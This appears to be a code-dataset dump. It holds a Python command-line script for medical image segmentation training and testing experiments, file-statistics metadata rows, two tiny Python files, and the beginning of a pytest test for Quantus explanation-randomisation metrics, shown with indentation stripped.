dataset_list.sort() # alphabetical, IF YOU DO NOT MAINTAIN ORDER A DIFFERENT TASK DIR IS CREATED FOR SAME DATASETS USED: eg: [lidc , brats] vs [brats, lids]
mode = kwargs_dict_.get("mode", "")
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="", task="FROM_SCRATCH{}".format(datasets_used_str), self_supervised=True, supervised=True, model=kwargs_dict_["model"]
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_sup = True
config.resume_ss = True
config.display()
trainer = Trainer(config, dataset)
completed_ss = trainer.ss_has_been_completed()
if not completed_ss:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
else:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def test(**kwargs):
from random import shuffle
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
enforce_test_again = kwargs_dict_["enforce_test_again"]
test_non_completed = kwargs_dict_["test_non_completed"]
mini_only = kwargs_dict_["mini_only"]
full_only = kwargs_dict_["full_only"]
task_dirs = get_task_dirs()
shuffle(task_dirs) # to have multiple metric collectors working
# print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name is not None:
if task_name not in task_dir:
# print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
# if not enforce_test_again:
# if not full_only:
# if task_dir_already_has_metric_dict_computed(task_dir) is True:
# print("\n\n SKIPPED TESTING WEIGHTS FROM AS IS ALREADY COMPUTED: ", task_dir)
# continue
# # only do full cubes after mini
# else:
# if task_dir_already_has_metric_dict_computed(task_dir) is False:
# print("\n\n SKIPPED FULL CUBES TESTING WEIGHTS AS MINI IS NOT YET COMPUTED: ", task_dir)
# continue
if "FROM_SCRATCH_BRAIN_UNET_ACS_SMALL_GN/only_supervised/run_2" in task_dir:
continue
if "_BRAIN_UNET_ACS_SMALL_GN_same_partition_batch_14" in task_dir:
continue
if "FROM_PROVIDED_WEIGHTS_lidc_VNET_MG" in task_dir:
if "new_folder" in task_dir:
pass
else:
already_done = False
split = task_dir.split("/")
split[0] = "FROM_PROVIDED_WEIGHTS_SS_AND_SUP_lidc_VNET_MG"
path = "/".join(split)
if task_dir_already_has_metric_dict_computed(path):
already_done = True
split = task_dir.split("/")
split[0] = "FROM_PROVIDED_WEIGHTS_SUP_ONLY_lidc_VNET_MG"
path = "/".join(split)
if task_dir_already_has_metric_dict_computed(path):
already_done = True
if already_done is True:
continue
if "run_1_copy" in task_dir:
continue
if "UNET_ACS_CLS_ONLY" in task_dir:
continue
if "cellari_heart_sup_2D_UNET_2D" in task_dir or "cellari_heart_sup_10_192_2D_UNET_2D" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
config_object = models_genesis_config(add_model_to_task=False)
config_object.override_dirs(int(task_dir[-1]))
if hasattr(config_object, "supervised") is False:
print("SKIPPING, no supervised attribute in config: \n", task_dir)
continue
if config_object.supervised is False:
print("SKIPPING, supervised is False in config: \n", task_dir)
# not testing modules which have not been tuned for segmentation
continue
print("\n\n TESTING WEIGHTS FROM: ", task_dir)
if ("FROM_PROVIDED_WEIGHTS_SUP_ONLY_lidc_VNET_MG" in config_object.model_path_save) or (
"FROM_PROVIDED_WEIGHTS_SS_AND_SUP_lidc_VNET_MG" in config_object.model_path_save
):
specific_weight_path_split = config_object.model_path_save.split("/")
specific_weight_path_split[1] = "FROM_PROVIDED_WEIGHTS_lidc_VNET_MG"
specific_weight_path = "/".join(specific_weight_path_split)
config_object.model_path_save = specific_weight_path
checkpoint = torch.load(
os.path.join(config_object.model_path_save, "weights_sup.pt"),
map_location=torch.device("cuda" if torch.cuda.is_available() else "cpu"),
)
print("TEST NON COMPLETED", test_non_completed)
if test_non_completed is False:
if checkpoint.get("completed_sup", None) is not True:
print("SKIPPING AS SUP IS NOT COMPLETED YET FOR {}".format(config_object.model_path_save))
continue
dataset_object = get_dataset_object_of_task_dir(task_dir)
if dataset_object is None:
x_train_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.train_fold]
x_val_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.valid_fold]
x_test_filenames = [
"bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.test_fold
] # Dont know in what sense they use this for
files = [x_train_filenames, x_val_filenames, x_test_filenames]
dataset_object = Dataset(
config_object.data_dir, train_val_test=(0.8, 0.2, 0), file_names=files
) # train_val_test is non relevant as is overwritten by files
tester = Tester(config_object, dataset_object)
if mini_only:
tester.test_segmentation_mini(enforce_test_again=enforce_test_again)
else:
raise ValueError
# elif full_only:
# tester.test_segmentation_full()
# else:
# tester.test_segmentation_mini()
# tester.test_segmentation_full()
def save_images(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
enforce_test_again = kwargs_dict_["enforce_test_again"]
mini_only = kwargs_dict_["mini_only"]
full_only = kwargs_dict_["full_only"]
task_dirs = get_task_dirs()
# print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name is not None:
if task_name not in task_dir:
# print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
if "FROM_PROVIDED_WEIGHTS_lidc_VNET_MG" in task_dir:
if "new_folder" in task_dir:
pass
else:
already_done = False
split = task_dir.split("/")
split[0] = "FROM_PROVIDED_WEIGHTS_SS_AND_SUP_lidc_VNET_MG"
path = "/".join(split)
if task_dir_already_has_metric_dict_computed(path):
already_done = True
split = task_dir.split("/")
split[0] = "FROM_PROVIDED_WEIGHTS_SUP_ONLY_lidc_VNET_MG"
path = "/".join(split)
if task_dir_already_has_metric_dict_computed(path):
already_done = True
if already_done is True:
continue
if "run_1_copy" in task_dir:
continue
if "UNET_ACS_CLS_ONLY" in task_dir:
continue
if "cellari_heart_sup_2D_UNET_2D" in task_dir or "cellari_heart_sup_10_192_2D_UNET_2D" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
config_object = models_genesis_config(add_model_to_task=False)
config_object.override_dirs(int(task_dir[-1]))
if hasattr(config_object, "supervised") is False:
print("SKIPPING, no supervised attribute in config: \n", task_dir)
continue
if config_object.supervised is False:
print("SKIPPING, supervised is False in config: \n", task_dir)
# not testing modules which have not been tuned for segmentation
continue
print("\n\n TESTING WEIGHTS FROM: ", task_dir)
if ("FROM_PROVIDED_WEIGHTS_SUP_ONLY_lidc_VNET_MG" in config_object.model_path_save) or (
"FROM_PROVIDED_WEIGHTS_SS_AND_SUP_lidc_VNET_MG" in config_object.model_path_save
):
specific_weight_path_split = config_object.model_path_save.split("/")
specific_weight_path_split[1] = "FROM_PROVIDED_WEIGHTS_lidc_VNET_MG"
specific_weight_path = "/".join(specific_weight_path_split)
config_object.model_path_save = specific_weight_path
checkpoint = torch.load(
os.path.join(config_object.model_path_save, "weights_sup.pt"),
map_location=torch.device("cuda" if torch.cuda.is_available() else "cpu"),
)
if checkpoint.get("completed_sup", None) is not True:
print("SKIPPING AS SUP IS NOT COMPLETED YET FOR {}".format(config_object.model_path_save))
continue
dataset_object = get_dataset_object_of_task_dir(task_dir)
if dataset_object is None:
x_train_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.train_fold]
x_val_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.valid_fold]
x_test_filenames = [
"bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.test_fold
] # Dont know in what sense they use this for
files = [x_train_filenames, x_val_filenames, x_test_filenames]
dataset_object = Dataset(
config_object.data_dir, train_val_test=(0.8, 0.2, 0), file_names=files
) # train_val_test is non relevant as is overwritten by files
tester = Tester(config_object, dataset_object)
tester.save_segmentation_examples()
def extract_features(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
task_name_exact = kwargs_dict_["task_name_exact"]
layer = kwargs_dict_["layer"]
task_dirs = get_task_dirs()
print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name_exact is not None:
if task_name_exact != task_dir:
continue
if task_name is not None:
if task_name not in task_dir:
# print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
if "AXIS_AWARE_DECODER" in task_dir:
continue
if "CUSTOM_ACS_OUT_MODULES" in task_dir:
continue
if "run_1_copy" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
raise ValueError
print("\n\n EXTRACTING FEATURES FROM: ", task_dir)
dataset_object = get_dataset_object_of_task_dir(task_dir)
feature_extractor = FeatureExtractor(config_object, dataset_object)
feature_extractor.extract_features(layer)
def plot_features(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
task_name_exact = kwargs_dict_["task_name_exact"]
layer = kwargs_dict_.get("layer", None)
phase = kwargs_dict_["phase"]
skip_connections = kwargs_dict_["skip_connections"]
task_dirs = get_task_dirs()
# print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name_exact is not None:
if task_name_exact != task_dir:
continue
if task_name is not None:
if task_name not in task_dir:
print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
if "run_1_copy" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
raise ValueError
print("\n\n EXTRACTING FEATURES FROM: ", task_dir)
dataset_object = get_dataset_object_of_task_dir(task_dir)
feature_extractor = FeatureExtractor(config_object, dataset_object)
if skip_connections:
feature_extractor.plot_feature_maps_low_dimensional_space_skip_connections()
else:
feature_extractor.plot_feature_maps_on_low_dimensional_space(layer=layer, phase=phase)
# feature_extractor.save_means_and_variances_hist_kl(layer)
def distribution_stats(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
task_name_exact = kwargs_dict_["task_name_exact"]
layer = kwargs_dict_.get("layer", None)
skip_connections = kwargs_dict_["skip_connections"]
task_dirs = get_task_dirs()
# print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name_exact is not None:
if task_name_exact != task_dir:
continue
if task_name is not None:
if task_name not in task_dir:
print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
if "run_1_copy" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
raise ValueError
print("\n\n EXTRACTING FEATURES FROM: ", task_dir)
dataset_object = get_dataset_object_of_task_dir(task_dir)
feature_extractor = FeatureExtractor(config_object, dataset_object)
feature_extractor.save_means_and_variances_hist_kl(layer)
def distance_measure(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
task_name_exact = kwargs_dict_["task_name_exact"]
layer = kwargs_dict_.get("layer", None)
skip_connections = kwargs_dict_["skip_connections"]
task_dirs = get_task_dirs()
phase = kwargs_dict_["phase"]
# print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name_exact is not None:
if task_name_exact != task_dir:
continue
if task_name is not None:
if task_name not in task_dir:
print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
if "run_1_copy" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
raise ValueError
dataset_object = get_dataset_object_of_task_dir(task_dir)
feature_extractor = FeatureExtractor(config_object, dataset_object)
feature_extractor.distance_measure(layer=layer, phase=phase)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--command", required=True, dest="command", type=str)
parser.add_argument("--run", required=False, dest="run", default=None, type=int)
parser.add_argument("-d", "--dataset", nargs="+", required=False, dest="dataset", default=[]) # python arg.py -l 1234 2345 3456 4567
parser.add_argument("--mode", required=False, dest="mode", default=None, type=str)
parser.add_argument(
"--directory",
required=False,
dest="directory",
type=str,
default=None,
help="Path to Model weights folder. E.g: pretrained_weights/GENESIS_REPLICATION_PRETRAIN_MODEL/run_5",
)
parser.add_argument("--split", nargs="+", required=False, dest="tr_val_ts_split", default=None, type=str)
parser.add_argument("--nb_epoch_ss", required=False, dest="nb_epoch_ss", type=int)
parser.add_argument("--nb_epoch_sup", required=False, dest="nb_epoch_sup", type=int)
parser.add_argument("-opt_ss", "--optimizer_ss", required=False, dest="optimizer_ss", type=str)
parser.add_argument("-sch_ss", "--scheduler_ss", required=False, dest="scheduler_ss", type=str)
parser.add_argument("-lr_ss", "--learning_rate_ss", required=False, dest="lr_ss", type=float)
parser.add_argument("--batch_size_ss", required=False, dest="batch_size_ss", type=int)
parser.add_argument("--patience_ss_terminate", required=False, dest="patience_ss_terminate", type=int)
parser.add_argument("--patience_ss", required=False, dest="patience_ss", type=int)
parser.add_argument("-opt_sup", "--optimizer_sup", required=False, dest="optimizer_sup", type=str)
parser.add_argument("-sch_sup", "--scheduler_sup", required=False, dest="scheduler_sup", type=str)
parser.add_argument("-lr_sup", "--learning_rate_sup", required=False, dest="lr_sup", type=float)
parser.add_argument("--batch_size_sup", required=False, dest="batch_size_sup", type=int)
parser.add_argument("--patience_sup_terminate", required=False, dest="patience_sup_terminate", type=int)
parser.add_argument("--patience_sup", required=False, dest="patience_sup", type=int)
parser.add_argument("--loss_function_sup", required=False, dest="loss_function_sup", type=str)
parser.add_argument("--introduce_surrogate_at_epoch", required=False, dest="introduce_surrogate_at_epoch", type=int, default=0)
parser.add_argument("--surrogate_loss_weight", required=False, dest="surrogate_loss_weight", type=float)
parser.add_argument("--save_model_every_n_epochs", required=False, dest="save_model_every_n_epochs", type=int, default=0)
parser.add_argument("--model", required=False, default="VNET_MG", dest="model", type=str)
parser.add_argument("--in_channels", required=False, dest="in_channels", type=int, default=1)
parser.add_argument("--out_channels", required=False, dest="out_channels", type=int, default=1)
parser.add_argument("--task_name", required=False, dest="task_name", type=str, default=None)
parser.add_argument("--task_name_exact", required=False, dest="task_name_exact", type=str, default=None)
parser.add_argument("--num_cv_folds", dest="num_cv_folds", type=int, required=False, default=None)
parser.add_argument("--cv_fold", dest="cv_fold", action="store_true", required=False)
parser.add_argument("--two_dimensional_data", dest="two_dimensional_data", action="store_true", required=False)
parser.add_argument("--convert_to_acs", dest="convert_to_acs", action="store_true", required=False)
parser.add_argument("--new_folder", dest="new_folder", action="store_true", required=False)
parser.add_argument("--use_supervision_transforms", dest="use_supervision_transforms", action="store_true", required=False)
parser.add_argument(
"--make_acs_kernel_split_adaptive_to_input_dimensions",
dest="make_acs_kernel_split_adaptive_to_input_dimensions",
action="store_true",
required=False,
)
parser.add_argument("--data_limit_2d", dest="data_limit_2d", required=False, default=None, type=int)
parser.add_argument("--return_axis_index", dest="return_axis_index", required=False, action="store_true")
parser.add_argument("--advance_index_on", dest="advance_index_on", required=False, default=1, type=int)
parser.add_argument("--enforce_test_again", dest="enforce_test_again", action="store_true", required=False)
parser.add_argument("--test_non_completed", dest="test_non_completed", action="store_true", required=False)
parser.add_argument("--add_batch_size_to_task", dest="add_batch_size_to_task", action="store_true", required=False)
parser.add_argument("--add_to_task", dest="add_to_task", required=False, type=str, default="")
parser.add_argument("--phase", dest="phase", required=False, type=str, default="both")
parser.add_argument("--mini_only", dest="mini_only", action="store_true", required=False)
parser.add_argument("--full_only", dest="full_only", action="store_true", required=False)
parser.add_argument("--pool_features", dest="pool_features", action="store_true", required=False)
parser.add_argument("--layer", dest="layer", nargs="+", required=False, type=int, default=None)
parser.add_argument("--skip_connections", dest="skip_connections", required=False, action="store_true")
parser.add_argument("--encoder_depth", dest="encoder_depth", nargs="+", required=False, type=int)
parser.add_argument("--branch_arch", dest="branch_arch", type=str, required=False)
parser.add_argument("--branch_depth", dest="branch_depth", type=int, required=False)
parser.add_argument("--bridge_mode", dest="bridge_mode", type=str, required=False)
# fix_unsqueeze_order: when converting to acs, axial kernel will be unsqueezed to (x,y,1) and sagitall to (1,y,z) only relavant for acs conversion
parser.add_argument("--fix_unsqueeze_order", dest="fix_unsqueeze_order", action="store_true", required=False)
args = parser.parse_args()
print(args)
if args.command == "replicate_model_genesis_pretrain":
print("STARTING REPLICATION OF RESULTS EXPERIMENT")
kwargs_dict = build_kwargs_dict(args)
replication_of_results_pretrain(kwargs_dict=kwargs_dict)
elif args.command == "resume_model_genesis_pretrain":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args)
print("RESUMING REPLICATION OF RESULTS EXPERIMENT FROM RUN {}".format(args.run))
resume_replication_of_results_pretrain(args.run, kwargs_dict=kwargs_dict)
elif args.command == "replicate_acs_results_fcnresnet18_my_cubes":
kwargs_dict = build_kwargs_dict(args, get_dataset=False, search_for_split=False)
assert kwargs_dict["model"] is not None and kwargs_dict["model"].lower() != "vnet_mg"
replicate_acs_results_fcnresnet18_my_cubes(kwargs_dict=kwargs_dict)
elif args.command == "resume_replicate_acs_results_fcnresnet18_my_cubes":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=False, search_for_split=False)
assert kwargs_dict["model"] is not None and kwargs_dict["model"].lower() != "vnet_mg"
resume_replicate_acs_results_fcnresnet18_my_cubes(run_nr=args.run, kwargs_dict=kwargs_dict)
elif args.command == "replicate_acs_results_fcnresnet18_their_cubes":
kwargs_dict = build_kwargs_dict(args, get_dataset=False, search_for_split=False)
assert kwargs_dict["model"] is not None and kwargs_dict["model"].lower() != "vnet_mg"
replicate_acs_results_fcnresnet18_their_cubes(kwargs_dict=kwargs_dict)
elif args.command == "finetune_from_provided_weights_no_ss":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True)
use_provided_weights_and_finetune_on_dataset_without_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_finetune_from_provided_weights_no_ss":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True)
print("RESUMING FINETUNE FROM PROVIDED WEIGHTS EXPERIMENT WITH NO SS FROM RUN {}".format(args.run))
print("DATASET: {} // MODE: {}".format(kwargs_dict["dataset"], args.mode))
resume_use_provided_weights_and_finetune_on_dataset_without_ss(run_nr=args.run, kwargs_dict=kwargs_dict)
elif args.command == "finetune_from_provided_weights_with_ss":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True)
use_provided_weights_and_finetune_on_dataset_with_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_finetune_from_provided_weights_with_ss":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True)
print("RESUMING FINETUNE FROM PROVIDED WEIGHTS EXPERIMENT WITH SS FROM RUN {}".format(args.run))
print("DATASET: {} // MODE: {}".format(kwargs_dict["dataset"], args.mode))
resume_use_provided_weights_and_finetune_on_dataset_with_ss(run_nr=args.run, kwargs_dict=kwargs_dict)
"""
---
"""
elif args.command == "pretrain_mg_framework":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True)
pretrain_mg_framework_specific_dataset(kwargs_dict=kwargs_dict)
elif args.command == "resume_pretrain_mg_framework":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True)
print("RESUMING PRETRAIN ACCORDING TO MG FRAMEWORK FROM RUN {}".format(args.run))
print("DATASET: {} // MODE: {}".format(kwargs_dict["dataset"], args.mode))
resume_pretrain_mg_framework_specific_dataset(run_nr=args.run, kwargs_dict=kwargs_dict)
"""
---
"""
elif args.command == "do_ss_from_model":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True, get_directory=True)
use_model_weights_and_do_self_supervision(kwargs_dict=kwargs_dict)
elif args.command == "resume_do_ss_from_model":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True, get_directory=True)
print("RESUMING SS FINETUNING FROM {} WEIGHTS SS FROM RUN {}".format(args.directory, args.run))
print("DATASET: {} // MODE: {}".format(kwargs_dict["dataset"], args.mode))
resume_use_model_weights_and_do_self_supervision(args.run, kwargs_dict=kwargs_dict)
elif args.command == "finetune_from_model_no_ss":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True, get_directory=True)
use_model_weights_and_finetune_on_dataset_without_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_finetune_from_model_no_ss":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True, get_directory=True)
print("RESUMING FINETUNE FROM {} WEIGHTS NO SS FROM RUN {}".format(args.directory, args.run))
print("DATASET: {} // MODE: {}".format(kwargs_dict["dataset"], args.mode))
resume_use_model_weights_and_finetune_on_dataset_without_ss(run_nr=args.run, kwargs_dict=kwargs_dict)
"""
---
"""
elif args.command == "finetune_from_model_with_ss":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True, get_directory=True)
use_model_weights_and_finetune_on_dataset_with_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_finetune_from_model_with_ss":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True, get_directory=True)
resume_use_model_weights_and_finetune_on_dataset_with_ss(args.run, kwargs_dict=kwargs_dict)
"""
---
"""
elif args.command == "from_scratch_supervised":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True)
train_from_scratch_on_dataset_no_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_from_scratch_supervised":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True)
resume_train_from_scratch_on_dataset_no_ss(run_nr=args.run, kwargs_dict=kwargs_dict)
elif args.command == "from_scratch_ss_and_sup":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True)
train_from_scratch_on_dataset_with_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_from_scratch_ss_and_sup":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True)
resume_train_from_scratch_on_dataset_with_ss(run_nr=args.run, kwargs_dict=kwargs_dict)
elif args.command == "test":
kwargs_dict = build_kwargs_dict(args, test=True, search_for_params=False)
test(kwargs_dict=kwargs_dict)
elif args.command == "extract_features":
kwargs_dict = build_kwargs_dict(args, search_for_params=False)
extract_features(kwargs_dict=kwargs_dict)
elif args.command == "plot_features":
kwargs_dict = build_kwargs_dict(args, search_for_params=False)
plot_features(kwargs_dict=kwargs_dict)
elif args.command == "save_images":
kwargs_dict = build_kwargs_dict(args, search_for_params=False)
save_images(kwargs_dict=kwargs_dict)
elif args.command == "distribution":
kwargs_dict = build_kwargs_dict(args, search_for_params=False)
distribution_stats(kwargs_dict=kwargs_dict)
elif args.command == "distance":
kwargs_dict = build_kwargs_dict(args, search_for_params=False)
distance_measure(kwargs_dict=kwargs_dict)
else:
raise ValueError("Input a valid command")
| 42.796189 | 161 | 0.697935 | 9,934 | 74,123 | 4.830179 | 0.043588 | 0.075235 | 0.02157 | 0.013672 | 0.890461 | 0.864535 | 0.852156 | 0.836859 | 0.811975 | 0.800429 | 0 | 0.005499 | 0.205078 | 74,123 | 1,731 | 162 | 42.820913 | 0.808849 | 0.07385 | 0 | 0.773684 | 0 | 0 | 0.15781 | 0.034719 | 0 | 0 | 0 | 0.000578 | 0.009774 | 1 | 0.020301 | false | 0.001504 | 0.009774 | 0 | 0.030075 | 0.035338 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
18cfaec2256b88e6a0988cbfd3bea4d67dc1f4f5 | 102 | py | Python | tests/algebra/test_sieve.py | tusshar2000/PyRival | 1d4b29e264088978243a9e72e4bc603acc1fee11 | [
"Apache-2.0"
] | 1 | 2020-06-14T16:11:21.000Z | 2020-06-14T16:11:21.000Z | tests/algebra/test_sieve.py | tusshar2000/PyRival | 1d4b29e264088978243a9e72e4bc603acc1fee11 | [
"Apache-2.0"
] | null | null | null | tests/algebra/test_sieve.py | tusshar2000/PyRival | 1d4b29e264088978243a9e72e4bc603acc1fee11 | [
"Apache-2.0"
] | null | null | null | from pyrival.sieve import *
def test_prime_list(primes):
assert primes == prime_list(primes[-1])
| 20.4 | 43 | 0.735294 | 15 | 102 | 4.8 | 0.733333 | 0.25 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011494 | 0.147059 | 102 | 4 | 44 | 25.5 | 0.816092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
18e4d81b9beb60e40fd189c370e71387d6951862 | 91 | py | Python | img2dataset/__init__.py | kanttouchthis/img2dataset | b7fc4a79760814d500f10bad16142ebbbcba60be | [
"MIT"
] | 482 | 2021-08-12T07:33:03.000Z | 2022-03-31T18:28:01.000Z | img2dataset/__init__.py | kanttouchthis/img2dataset | b7fc4a79760814d500f10bad16142ebbbcba60be | [
"MIT"
] | 118 | 2021-08-12T07:02:37.000Z | 2022-03-31T20:20:18.000Z | img2dataset/__init__.py | kanttouchthis/img2dataset | b7fc4a79760814d500f10bad16142ebbbcba60be | [
"MIT"
] | 39 | 2021-08-21T20:31:46.000Z | 2022-03-30T12:16:49.000Z | """Img2dataset"""
from img2dataset.main import main
from img2dataset.main import download
| 18.2 | 37 | 0.802198 | 11 | 91 | 6.636364 | 0.454545 | 0.410959 | 0.520548 | 0.684932 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 0.10989 | 91 | 4 | 38 | 22.75 | 0.864198 | 0.120879 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e1525dd7e25218db8244d670997c56347429a2ea | 9,951 | py | Python | tests/metrics/test_randomisation_metrics.py | sebastian-lapuschkin/Quantus | c3b8a9fb2018f34bd89ba38efa2b2b8c38128b3f | [
"MIT"
] | null | null | null | tests/metrics/test_randomisation_metrics.py | sebastian-lapuschkin/Quantus | c3b8a9fb2018f34bd89ba38efa2b2b8c38128b3f | [
"MIT"
] | null | null | null | tests/metrics/test_randomisation_metrics.py | sebastian-lapuschkin/Quantus | c3b8a9fb2018f34bd89ba38efa2b2b8c38128b3f | [
"MIT"
] | null | null | null | from typing import Union
import numpy as np
import pytest
from pytest_lazyfixture import lazy_fixture
from ..fixtures import *
from ...quantus.metrics import *
from ...quantus.helpers import *
from ...quantus.helpers.explanation_func import explain
from ...quantus.helpers.model_interface import ModelInterface
@pytest.mark.randomisation
@pytest.mark.parametrize(
"model,data,params,expected",
[
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"layer_order": "top_down",
"similarity_func": correlation_spearman,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": False,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"layer_order": "top_down",
"similarity_func": correlation_spearman,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": False,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_1d_3ch_conv_model"),
lazy_fixture("almost_uniform_1d_no_abatch"),
{
"layer_order": "bottom_up",
"similarity_func": correlation_pearson,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model"),
lazy_fixture("load_mnist_images"),
{
"layer_order": "bottom_up",
"similarity_func": correlation_pearson,
"normalise": True,
"explain_func": explain,
"method": "Saliency",
"disable_warnings": True,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_mnist_model_tf"),
lazy_fixture("load_mnist_images_tf"),
{
"layer_order": "top_down",
"similarity_func": correlation_spearman,
"normalise": True,
"explain_func": explain,
"method": "Gradient",
"disable_warnings": True,
"display_progressbar": False,
},
{"min": -1.0, "max": 1.0},
),
(
lazy_fixture("load_1d_3ch_conv_model_tf"),
lazy_fixture("almost_uniform_1d_no_abatch_channel_last"),
{
"layer_order": "bottom_up",
"similarity_func": correlation_pearson,
"normalise": True,
"explain_func": explain,
"method": "Gradient",
